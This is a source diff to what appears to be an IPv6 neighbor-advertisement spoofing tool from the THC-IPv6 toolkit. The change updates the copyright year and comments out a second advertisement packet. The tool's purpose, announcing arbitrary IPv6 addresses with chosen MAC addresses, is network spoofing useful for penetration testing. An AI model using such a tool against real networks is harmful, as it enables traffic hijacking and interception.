@@ -11,7 +11,7 @@
 #include "thc-ipv6.h"
 
 void help(char *prg) {
-  printf("%s %s (c) 2015 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
+  printf("%s %s (c) 2017 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
   printf("Syntax: %s [-DHF] [-Ors] [-n count] [-w seconds] interface ip-address-advertised [target-address [mac-address-advertised [source-ip-address]]]\n\n", prg);
   printf("Advertise IPv6 address on the network (with own mac if not specified),\n");
   printf("sending it to the all-nodes multicast address if no target address is set.\n");
@@ -154,6 +154,7 @@ int main(int argc, char *argv[]) {
     fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
     exit(-1);
   }
+/*
   if ((pkt2 = thc_create_ipv6_extended(interface, prefer, &pkt2_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
     return -1;
   if (do_hop)
@@ -172,7 +173,7 @@ int main(int argc, char *argv[]) {
     fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
     exit(-1);
   }
-
+*/
   printf("Starting advertisement of %s (Press Control-C to end)\n", argv[optind + 1]);
   while (loop) {
     if (do_dst) {
@@ -182,7 +183,7 @@ int main(int argc, char *argv[]) {
       thc_send_as_fragment6(interface, src6, dst6, type, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240);
     } else {
       thc_send_pkt(interface, pkt1, &pkt1_len);
-      thc_send_pkt(interface, pkt2, &pkt2_len);
+//      thc_send_pkt(interface, pkt2, &pkt2_len);
     }
     if (loop != -1)
       loop--;
